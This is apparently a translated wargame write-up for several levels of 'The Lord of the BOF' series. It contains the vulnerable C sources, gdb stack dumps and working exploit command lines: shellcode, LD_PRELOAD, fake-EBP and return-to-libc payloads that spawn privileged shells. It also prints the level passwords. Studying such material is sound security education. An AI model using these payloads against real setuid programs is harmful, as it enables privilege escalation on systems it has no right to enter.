"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"


Then.. shall I try printf's output buffer?..


$2 = (FILE *) 0x40106980

(gdb) x/x 0x40106980

0x40106980 <_IO_2_1_stdout_>:   0xfbad2a84

(gdb)

0x40106984 <_IO_2_1_stdout_+4>: 0x40015000

(gdb)

0x40106988 <_IO_2_1_stdout_+8>: 0x40015000

(gdb)

0x4010698c <_IO_2_1_stdout_+12>:        0x40015000

(gdb)

0x40106990 <_IO_2_1_stdout_+16>:        0x40015000

(gdb)

0x40106994 <_IO_2_1_stdout_+20>:        0x40015000

(gdb)

0x40106998 <_IO_2_1_stdout_+24>:        0x40015000

(gdb)

0x4010699c <_IO_2_1_stdout_+28>:        0x40015000

(gdb)

0x401069a0 <_IO_2_1_stdout_+32>:        0x40015400

(gdb)

0x401069a4 <_IO_2_1_stdout_+36>:        0x00000000

(gdb)

0x401069a8 <_IO_2_1_stdout_+40>:        0x00000000

(gdb)

0x401069ac <_IO_2_1_stdout_+44>:        0x00000000

(gdb) x/x 0x40015000

0x40015000:     0x41414141

(gdb)

0x40015004:     0x41414141

(gdb)

0x40015008:     0x41414141

(gdb)

0x4001500c:     0x41414141


The output buffer starts at 0x40015000, but that address has a null byte in it..-_-;

Hmm... and the address has to start with 0xbf.... is there a way around that?..


Hmm.. ended up searching the internet.-_-

Have to use the LD_PRELOAD environment variable.

The name of the dynamically linked library file gets stored on the stack (below the buffer, outside the range the memset clears). That can be used to exploit it..-_-

Hmm.............................. I see.... so that's how it is-_-;;


gcc -shared -Wl,-soname,"`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1 -o "`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1.0.1 ld.o -lc

export LD_PRELOAD="`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1.0.1



gcc -shared -Wl,-soname,"`perl -e '{print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1 -o "`perl -e '{print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1.0.1 ld.o -lc

export LD_PRELOAD="`perl -e '{print "/home/skeleton/\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1.0.1



0xbffff620:     0x40013868     0xbffff7a4     0x4000380e     0x40014420

0xbffff630:     0x6d6f682f     0x6b732f65     0x74656c65     0xeb2f6e6f

0xbffff640:     0xc9315e11     0x6c8032b1     0x8001ff0e     0xf67501e9

0xbffff650:     0xeae805eb     0x32ffffff     0x306951c1     0x69697430

0xbffff660:     0x6f6a6330     0x5451e48a     0xb19ae28a     0x2e81ce0c

0xbffff670:     0x312e6f73     0x312e302e     0x40002900     0x40013868

0xbffff680:     0x4000220c     0xbffffbc1     0x00000000     0x00000000

0xbffff690:     0x00000000     0x00000000     0x40014900     0x00000000


0xbffff63f




[skeleton@localhost skeleton]$ ./ttttt "`perl -e '{print "A"x40,"BBBB","\x3f\xf6\xff\xbf"}'`"




[skeleton@localhost skeleton]$ ./golem "`perl -e '{print "A"x40,"BBBB","\x3f\xf6\xff\xbf"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB??

bash$ id

uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)

bash$ whoami

golem

bash$ /bin/my-pass

euid = 511

cup of coffee

bash$



============================================================================================

[golem@localhost golem]$ cat darkknight.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkknight

        - FPO

*/


#include <stdio.h>

#include <stdlib.h>


void problem_child(char *src)

{

     char buffer[40];

     strncpy(buffer, src, 41);

     printf("%s\n", buffer);

}


main(int argc, char *argv[])

{

     if(argc<2){

          printf("argv error\n");

          exit(0);

     }


     problem_child(argv[1]);

}

[golem@localhost golem]$


============================================================================================

08048440 <problem_child>:

8048440:     55                        push   %ebp

8048441:     89 e5                     mov    %esp,%ebp

8048443:     83 ec 28                  sub    $0x28,%esp

8048446:     6a 29                     push   $0x29

8048448:     8b 45 08                  mov    0x8(%ebp),%eax

804844b:     50                        push   %eax

804844c:     8d 45 d8                  lea    0xffffffd8(%ebp),%eax

804844f:     50                        push   %eax

8048450:     e8 1f ff ff ff            call   8048374 <_init+0x90>

8048455:     83 c4 0c                  add    $0xc,%esp

8048458:     8d 45 d8                  lea    0xffffffd8(%ebp),%eax

804845b:     50                        push   %eax

804845c:     68 00 85 04 08            push   $0x8048500

8048461:     e8 ee fe ff ff            call   8048354 <_init+0x70>

8048466:     83 c4 08                  add    $0x8,%esp

8048469:     c9                        leave 

804846a:     c3                        ret   

804846b:     90                        nop   


0804846c <main>:

804846c:     55                        push   %ebp

804846d:     89 e5                     mov    %esp,%ebp

804846f:     83 7d 08 01               cmpl   $0x1,0x8(%ebp)

8048473:     7f 1b                     jg     8048490 <main+0x24>

8048475:     68 04 85 04 08            push   $0x8048504

804847a:     e8 d5 fe ff ff            call   8048354 <_init+0x70>

804847f:     83 c4 04                  add    $0x4,%esp

8048482:     6a 00                     push   $0x0

8048484:     e8 db fe ff ff            call   8048364 <_init+0x80>

8048489:     83 c4 04                  add    $0x4,%esp

804848c:     8d 74 26 00               lea    0x0(%esi,1),%esi

8048490:     8b 45 0c                  mov    0xc(%ebp),%eax

8048493:     83 c0 04                  add    $0x4,%eax

8048496:     8b 10                     mov    (%eax),%edx

8048498:     52                        push   %edx

8048499:     e8 a2 ff ff ff            call   8048440 <problem_child>

804849e:     83 c4 04                  add    $0x4,%esp

80484a1:     c9                        leave 

80484a2:     c3                        ret   






This is a problem where only the last byte of the SFP can be changed.

It is solved using the consecutive leave, ret pairs.

After changing the SFP, the first leave, ret moves where the stack is, and then the next leave, ret (main's) jumps to the point we want.


leave is

mov %ebp, %esp   (esp = ebp)

pop %ebp


and ret is

pop %eip

in effect.


The stack is laid out as [problem_child buffer][SFP][RET][main variables][SFP][RET].

If the SFP here is changed to the address of problem_child's buffer,

then when we return to main, the frame pointer (and, after main's leave, esp) points at problem_child's buffer, and the leave, ret that follow in main

make it work with shellcode laid out as [DEAD][EIP][shellcode][..][last byte of SFP], where DEAD is the 4 dummy bytes that get popped into ebp.
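As an added illustration (not from the original write-up) of the leave/ret chain just described: a small C model of the two frames from the gdb dump above, using that dump's addresses, showing that a 41-byte strncpy lets the word at buffer+4 become the final eip, while a copy bounded to the 40-byte buffer leaves the normal return path intact. The modelled stack, the register struct and the 'A' filler are constructed here and are not part of the challenge.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model addresses taken from the write-up's gdb dump of darkknight:
 * problem_child's 40-byte buffer starts at 0xbffffac4 (ebp-0x28).
 * Everything below is an in-memory model; no real frame is touched. */
#define BUF_ADDR   0xbffffac4u
#define STACK_SIZE 64          /* bytes of modelled stack, starting at BUF_ADDR */

struct cpu { uint32_t esp, ebp, eip; };

/* Little-endian 32-bit read/write at a modelled address. */
static uint32_t rd32(const uint8_t *stk, uint32_t addr) {
    const uint8_t *p = stk + (addr - BUF_ADDR);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint8_t *stk, uint32_t addr, uint32_t v) {
    uint8_t *p = stk + (addr - BUF_ADDR);
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* leave = mov %ebp,%esp ; pop %ebp        ret = pop %eip */
static void op_leave(struct cpu *c, const uint8_t *stk) {
    c->esp = c->ebp;
    c->ebp = rd32(stk, c->esp);
    c->esp += 4;
}
static void op_ret(struct cpu *c, const uint8_t *stk) {
    c->eip = rd32(stk, c->esp);
    c->esp += 4;
}

/* Lay out problem_child's and main's frames as the dump shows them. */
static void build_frames(uint8_t *stk) {
    memset(stk, 0, STACK_SIZE);
    wr32(stk, 0xbffffaec, 0xbffffaf8);  /* problem_child SFP = main's ebp    */
    wr32(stk, 0xbffffaf0, 0x0804849e);  /* problem_child RET -> back in main */
    wr32(stk, 0xbffffaf4, 0xbffffc50);  /* argv[1] pushed by main            */
    wr32(stk, 0xbffffaf8, 0xbffffb18);  /* main SFP                          */
    wr32(stk, 0xbffffafc, 0x400309cb);  /* main RET -> __libc_start_main     */
}

/* Copy ncopy bytes of a constructed 41-byte input into the buffer (what
 * strncpy does when src holds no NUL), then run problem_child's leave/ret,
 * main's add $4,%esp and main's leave/ret. Returns the final registers. */
struct cpu simulate(size_t ncopy) {
    uint8_t stk[STACK_SIZE];
    uint8_t src[41];
    struct cpu c;

    memset(src, 'A', sizeof src);          /* filler; bytes 0..3 are the word popped into ebp */
    src[4] = 0xcf; src[5] = 0xfa; src[6] = 0xff; src[7] = 0xbf;  /* word at buffer+4 */
    src[40] = 0xc4;                        /* the 41st byte: low byte of the SFP */

    build_frames(stk);
    if (ncopy > sizeof src) ncopy = sizeof src;
    memcpy(stk, src, ncopy);

    c.ebp = 0xbffffaec;                    /* problem_child's frame pointer */
    c.esp = BUF_ADDR;                      /* esp once the call arguments are popped */
    c.eip = 0;
    op_leave(&c, stk); op_ret(&c, stk);    /* problem_child returns into main at 0x0804849e */
    c.esp += 4;                            /* main: add $0x4,%esp */
    op_leave(&c, stk); op_ret(&c, stk);    /* main's epilogue */
    return c;
}

uint32_t final_eip(size_t ncopy) { return simulate(ncopy).eip; }

int main(void) {
    struct cpu v = simulate(41);   /* darkknight's strncpy(buffer, src, 41) */
    struct cpu h = simulate(40);   /* copy bounded to the buffer: SFP untouched */
    printf("41 bytes: eip=%08" PRIx32 " ebp=%08" PRIx32 "\n", v.eip, v.ebp);  /* bffffacf 41414141 */
    printf("40 bytes: eip=%08" PRIx32 " ebp=%08" PRIx32 "\n", h.eip, h.ebp);  /* 400309cb bffffb18 */
    return 0;
}
```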



(gdb) x/100x 0xbffffaa0

0xbffffaa0:     0x40066070      0x40106980      0x08048500      0xbffffac4

0xbffffab0:     0x401081ec      0xbffffaec      0x08048466      0x08048500

0xbffffac0:     0xbffffac4      0x41414141      0x42424242      0x90909090

0xbffffad0:     0x31909090      0x2f6850c0      0x6868732f      0x6e69622f

0xbffffae0:     0x5350e389      0xd231e189      0x80cd0bb0      0xbffffa00

0xbffffaf0:     0x0804849e      0xbffffc50      0xbffffb18      0x400309cb

0xbffffb00:     0x00000002      0xbffffb44      0xbffffb50      0x40013868

0xbffffb10:     0x00000002      0x08048390      0x00000000      0x080483b1

0xbffffb20:     0x0804846c      0x00000002      0xbffffb44      0x080482e4

0xbffffb30:     0x080484dc      0x4000ae60      0xbffffb3c      0x40013e90


[golem@localhost golem]$ ./ttttttttt "`perl -e '{print "AAAA","\xcf\xfa\xff\xbf","\x90"x7,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","\xc4"}'`"


[golem@localhost golem]$ ./darkknight "`perl -e '{print "AAAA","\xcf\xfa\xff\xbf","\x90"x7,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","\xc4"}'`"

AAAA饋퓧릱릱릱1픐h//shh/bin됥PS됣1柰

                                     ?퀭퓹

                                           M???옹    @

bash$ id

uid=511(golem) gid=511(golem) euid=512(darkknight) egid=512(darkknight) groups=511(golem)

bash$ whoami

darkknight

bash$ id

uid=511(golem) gid=511(golem) euid=512(darkknight) egid=512(darkknight) groups=511(golem)

bash$ /bin/my-pass

euid = 512

new attacker

bash$

bash$




==========================================================================

[darkknight@localhost darkknight]$ cat bugbear.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - bugbear

        - RTL1

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] == '\xbf')

        {

                printf("stack betrayed you!!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[darkknight@localhost darkknight]$

=====================================================================

Now it's an RTL problem!..


Let's solve it simply.


[darkknight@localhost darkknight]$ export FMT="%513d%3\$n%4\$n"

[darkknight@localhost darkknight]$ ./envvvvv FMT

%513d%3$n%4$n : 0xbffffead

[darkknight@localhost darkknight]$ ./envvvvv SHELL  

/bin/bash : 0xbfffff48


(gdb) x/100x $esp-0x20

0xbffffa90:     0x41414141      0x41414141      0x41414141      0x41414141

0xbffffaa0:     0x41414141      0x41414141      0x42424242      0x41414141

0xbffffab0:     0x4006604c      0x400cc104      0xbffffead      0x400c4e20

0xbffffac0:     0x400cc103      0xbffffa90      0xbffffa94      0x40058ae0

0xbffffad0:     0x41414141      0xbfffff48      0xbffffa00      0x080482e0

0xbffffae0:     0x080484dc      0x4000ae60      0xbffffaec      0x40013e90

0xbffffaf0:     0x00000002      0xbffffbe5      0xbffffbef      0x00000000

0xbffffb00:     0xbffffc48      0xbffffc5d      0xbffffc76      0xbffffc95

0xbffffb10:     0xbffffcb7      0xbffffcc7      0xbffffe8a      0xbffffea9

0xbffffb20:     0xbffffebb      0xbffffedb      0xbffffef0      0xbfffff12



pop-ret : 0x400cc104

pop-pop-ret : 0x400cc103

[BUF][SFP][printf][pop-ret][FMT(%3$n%4$n)][setreuid][pop-pop-ret][selfaddr][selfaddr][system][AAAA][/bin/sh]

"`perl -e '{print "A"x40,"BBBB","\x4c\x60\x06\x40","\x04\xc1\x0c\x40","\xad\xfe\xff\xbf","\x20\x4e\x0c\x40","\x03\xc1\x0c\x40","\xc0\xfa\xff\xbf","\xc4\xfa\xff\xbf", "\xe0\x8a\x05\x40", "AAAA", "\x48\xff\xff\xbf"}'`"


[darkknight@localhost darkknight]$ ./bugbear "`perl -e '{print "A"x40,"BBBB","\x4c\x60\x06\x40","\x04\xc1\x0c\x40","\xad\xfe\xff\xbf","\x20\x4e\x0c\x40","\x03\xc1\x0c\x40","\xc0\xfa\xff\xbf","\xc4\xfa\xff\xbf", "\xe0\x8a\x05\x40", "AAAA", "\x48\xff\xff\xbf"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBL`@?@??N

                                                        @?@저옭?욈?@AAAAH?

                                                                                 bash: /home/darkknight/.bashrc: Permission denied

bash$ whoami

bugbear

bash$ id

uid=513(bugbear) gid=512(darkknight) egid=513(bugbear) groups=512(darkknight)

bash$ /bin/my-pass

euid = 513

new divide

bash$





=================================================================================

[bugbear@localhost bugbear]$ cat giant.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - giant

        - RTL2

*/


#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>


main(int argc, char *argv[])

{

        char buffer[40];

        FILE *fp;

        char *lib_addr, *execve_offset, *execve_addr;

        char *ret;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // gain address of execve

        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");

        fgets(buffer, 255, fp);

        sscanf(buffer, "(%x)", &lib_addr);

        fclose(fp);


        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");

        fgets(buffer, 255, fp);

        sscanf(buffer, "%x", &execve_offset);

        fclose(fp);


        execve_addr = lib_addr + (int)execve_offset;

        // end


        memcpy(&ret, &(argv[1][44]), 4);

        if(ret != execve_addr)

        {

                printf("You must use execve!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

===============================================================================

The first place EIP is changed to must be the execve function.


       int execve (const char *filename, char *const argv [], char *const envp[]);


Need to make an egg;


$1 = {<text variable, no debug info>} 0x400a9d48 <__execve>

/tmp/egg : 0xbffffec5


"`perl -e '{print "A"x40,"BBBB","\x48\x9d\x0a\x40","CCCC","\xc5\xfe\xff\xbf","\xf4\xfa\xff\xbf","\xfc\xff\xff\xbf"}'`"


Can't debug because of permissions.ㅡㅡ;;

  --> Since the source is there, modify it, compile it and test with that..;



Let's look at execve's arguments.

The first argument is a pointer to where the name of the file to execute is stored, i.e. the address of the egg environment variable will do. This one is.. well-.


The second argument is the problem.

It takes an array of pointers.

The array of pointers has to hold the value passed as the first argument, with NULL at the next address, and this part is awkward to fit in.

  - Searching the internet, the commonly(?) used technique is this: when a command is run by the shell and the process starts, its own argv and environment values are stored at the very top of the stack.

    That is, since it is executed by some process, the second and third arguments of the execve the parent process used end up stored at the very top of the stack.

      - It may sound a bit odd, but.. that's how it is- those who get it will get it..ㅡㅡ.

      - Anyway, if you rename the file and run it, you can build a pointer array of the form [the address we want (the end of the link file name)][NULL].

    So here too, we could create a link to fake the file name and run the program.


The third argument... isn't very important, so it should be fine to put in roughly anything.



Anyway.. that's one method, but isn't there another way?


[bugbear@localhost bugbear]$ cat tmp/ex.c

#include <stdio.h>

#include <unistd.h>   /* execve() was used without its header in the original */


int main()

{

char *ss[2];

ss[0] = "df";     /* argv[0] of the new image; its content does not matter */

ss[1] = NULL;     /* argv must be NULL-terminated */

execve("/bin/ls", ss, NULL);

return 0;

}

[bugbear@localhost bugbear]$

Compiling and running this works. So the second argument isn't that important?...


(gdb) x/100x $esp

0xbffffae4:     0xbffffec5      0xbffffff4      0xfbfffffc      0x00000000

0xbffffaf4:     0x080484b0      0x00000000      0x080484d1      0x08048560

0xbffffb04:     0x00000002      0xbffffb24      0x080483b4      0x080486bc

0xbffffb14:     0x4000ae60


Hm.. it works.ㅋㅋ Looks like the argument only needs to have the right format..;


[bugbear@localhost bugbear]$ ./giant "`perl -e '{print "A"x40,"BBBB","\x48\x9d\x0a\x40","CCCC","\xc5\xfe\xff\xbf","\xf4\xfa\xff\xbf","\xfc\xff\xff\xbf"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBH?

                                               @CCCC퉜웃?웠?

                                                                 bash$ whoami

giant

bash$ is

sh: is: command not found

bash$ ls

ls: .: Permission denied

bash$ id

uid=514(giant) gid=513(bugbear) egid=514(giant) groups=513(bugbear)

bash$ /bin/my-pass

euid = 514

one step closer

bash$



================================================================================================

[giant@localhost giant]$ cat assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - assassin

        - no stack, no RTL

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }


        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer+sfp hunter

        memset(buffer, 0, 44);

}

[giant@localhost giant]$

===============================================================================================



Not RTL, and not BOF... so is it ROP?..

The easy way is to put the address of main's RET instruction into the first RET slot and just continue with RTL after that.

But that's surely not the method the challenge wants......

ROP shouldn't be showing up this early either....hmm;..


Let's just solve it the easy way.


0x804851e <main+174>:   ret   


"`perl -e '{print "A"x40,"BBBB","\x1e\x85\x04\x08","\xe0\x8a\x05\x40","CCCC","\xc7\x01\x10\x40"}'`"


$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>


This time with system?..

0x401001c7:      "/bin/sh"


[giant@localhost giant]$ ./assassin "`perl -e '{print "A"x40,"BBBB","\x1e\x85\x04\x08","\xe0\x8a\x05\x40","CCCC","\xc7\x01\x10\x40"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

?@CCCC?@

bash$ whoami

assassin

bash$ is

sh: is: command not found

bash$ id

uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)

bash$ /bin/my-pass

euid = 515

pushing me away

bash$

bash$



==================================================================

[assassin@localhost assassin]$ cat zombie_assassin.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - zombie_assassin
        - FEBP
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }

        // strncpy instead of strcpy!
        strncpy(buffer, argv[1], 48);
        printf("%s\n", buffer);
}
[assassin@localhost assassin]$

=================================================================


There's no stack hunter, but strncpy is used instead of strcpy, so only 4 bytes can be overwritten.

Call leave, ret twice in a row to switch the stack?..
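zombie_assassin.c bounds its strncpy with 48, not with the 40-byte size of buffer, so the copy still reaches the saved EBP and the return address (and, because strncpy pads with NULs, even a short argument zeroes them). The following is an added example, not the wargame's or the author's code: the same call replayed into a stand-in frame so the overwrite can be counted, beside a copy whose bound comes from the destination size. frame_t, copy_arg_unsafe, copy_arg_safe and the constructed inputs are names and values assumed here for illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   40   /* char buffer[40] in the challenge source */
#define FRAME_SIZE 48   /* buffer + saved EBP (4) + return address (4) */

/* Stand-in for the stack frame (assumed layout) so the overwrite is observable
 * without corrupting the real stack: bytes 0..39 are the buffer, 40..43 stand
 * in for the saved EBP (marker 0xAA) and 44..47 for the return address (0xBB). */
typedef struct { unsigned char bytes[FRAME_SIZE]; } frame_t;

void frame_init(frame_t *f)
{
    memset(f->bytes, 0, BUF_SIZE);
    memset(f->bytes + BUF_SIZE, 0xAA, 4);
    memset(f->bytes + BUF_SIZE + 4, 0xBB, 4);
}

/* Number of the 8 sentinel bytes that no longer hold their marker. */
int clobbered_bytes(const frame_t *f)
{
    int n = 0, i;
    for (i = 0; i < 4; i++) n += f->bytes[BUF_SIZE + i] != 0xAA;
    for (i = 0; i < 4; i++) n += f->bytes[BUF_SIZE + 4 + i] != 0xBB;
    return n;
}

/* The pattern from zombie_assassin.c: strncpy(buffer, argv[1], 48), with the
 * bound chosen independently of the destination. strncpy always writes exactly
 * 48 bytes (NUL-padding short input), so the saved EBP and return slots are
 * written on every call: a long argument puts its bytes 40..47 there, a short
 * one zeroes them. */
void copy_arg_unsafe(frame_t *f, const char *arg)
{
    strncpy((char *)f->bytes, arg, 48);
}

/* Hardened variant: the bound is the destination size, the result is always
 * NUL-terminated, and input that does not fit is rejected (-1) rather than
 * silently truncated, so the caller can fail closed. */
int copy_arg_safe(frame_t *f, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= BUF_SIZE)
        return -1;
    memcpy(f->bytes, arg, n + 1);   /* n + 1 <= BUF_SIZE: stays inside the buffer */
    return 0;
}

/* Runs one argument through both copies and returns the number of sentinel
 * bytes the unsafe copy changed; the safe copy never changes any. */
int demo(const char *arg)
{
    frame_t a, b;
    int rc;
    frame_init(&a);
    frame_init(&b);
    copy_arg_unsafe(&a, arg);
    rc = copy_arg_safe(&b, arg);
    printf("len=%zu  unsafe: %d sentinel bytes clobbered  safe: rc=%d, %d clobbered\n",
           strlen(arg), clobbered_bytes(&a), rc, clobbered_bytes(&b));
    return clobbered_bytes(&a);
}

int main(void)
{
    char filler[49];                 /* constructed input: 48 x 'A' */
    memset(filler, 'A', 48);
    filler[48] = '\0';
    demo("short argument");          /* constructed input */
    demo(filler);
    return 0;
}
```

The hardened copy refuses anything of 40 bytes or more instead of truncating, which is what turns the challenge's "only 4 bytes can be overwritten" into zero bytes.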


0x80484df <main+159>:   leave 

0x80484e0 <main+160>:   ret 


0xbffffb90:     0x00000006    0x00000006      0x00001000        0x00000007
0xbffffba0:     0x40000000    0x00000008      0x00000000        0x00000009
0xbffffbb0:     0x08048390    0x0000000b      0x00000203        0x0000000c
0xbffffbc0:     0x00000203    0x0000000d      0x00000203        0x0000000e
0xbffffbd0:     0x00000203    0x00000010      0x0febfbff        0x0000000f
0xbffffbe0:     0xbffffc04    0x00000000      0x00000000        0x00000000
0xbffffbf0:     0x00000000    0x00000000      0x00000000        0x00000000
0xbffffc00:     0x00000000    0x36383669      0x742f2e00        0x74747474
0xbffffc10:     0x74745f74    0x74747474      0x41007474        0x41414141
0xbffffc20:     0x41414141    0x41414141      0x41414141        0x41414141
0xbffffc30:     0x41414141    0x41414141      0x41414141        0x41414141
0xbffffc40:     0x42414141    0x1e424242      0xe0080485        0x4340058a
0xbffffc50:     0xc7434343    0x00401001      0x3d445750        0x6d6f682f


$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>


"`perl -e '{print "\x27\xfc\xff\xbf","\xe0\x8a\x05\x40","CCCC","\xc7\x01\x10\x40","A"x24,"\x27\xfc\xff\xbf","\xdf\x84\x04\x08"}'`"





[assassin@localhost assassin]$ ./zombie_assassin "`perl -e '{print "BBBB"x1,"\xe0\x8a\x05\x40","CCCC","\xc7\x01\x10\x40","A"x24,"\xa0\xfa\xff\xbf","\xdf\x84\x04\x08"}'`"               

BBBB?@CCCC?@AAAAAAAAAAAAAAAAAAAAAAAA좞욀


bash$ id

uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)

bash$ whoami

zombie_assassin

bash$ /bin/my-pass

euid = 516

no place to hide

bash$



I struggled a bit because of the buffer's location.

It seems the problem was that the values I entered were being overwritten because of where the stack ended up after switching to the fake ebp.

흠....-_-;



=======================================================================================

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - succubus
        - calling functions continuously
*/

#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>

// the inspector
int check = 0;

void MO(char *cmd)
{
        if(check != 4)
                exit(0);

        printf("welcome to the MO!\n");

        // olleh!
        system(cmd);
}

void YUT(void)
{
        if(check != 3)
                exit(0);

        printf("welcome to the YUT!\n");
        check = 4;
}

void GUL(void)
{
        if(check != 2)
                exit(0);

        printf("welcome to the GUL!\n");
        check = 3;
}

void GYE(void)
{
        if(check != 1)
                exit(0);

        printf("welcome to the GYE!\n");
        check = 2;
}

void DO(void)
{
        printf("welcome to the DO!\n");
        check = 1;
}

main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // you cannot use library
        if(strchr(argv[1], '\x40')){
                printf("You cannot use library\n");
                exit(0);
        }

        // check address
        addr = (char *)&DO;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with DO\n");
                exit(0);
        }

        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // stack destroyer
        // 100 : extra space for copied argv[1]
        memset(buffer, 0, 44);
        memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

        // LD_* eraser
        // 40 : extra space for memset function
        memset(buffer-3000, 0, 3000-40);
}
[zombie_assassin@localhost zombie_assassin]$



(gdb) print main

$1 = {<text variable, no debug info>} 0x8048808 <main>

(gdb) print DO

$2 = {<text variable, no debug info>} 0x80487ec <DO>

(gdb) print GYE

$3 = {<text variable, no debug info>} 0x80487bc <GYE>

(gdb) print GUL

$4 = {<text variable, no debug info>} 0x804878c <GUL>

(gdb) print YUT

$5 = {<text variable, no debug info>} 0x804875c <YUT>

(gdb) print MO

$6 = {<text variable, no debug info>} 0x8048724 <MO>

(gdb)


"`perl -e '{print "A"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","\xc7\x01\x10\x40","/bin/sh"}'`"




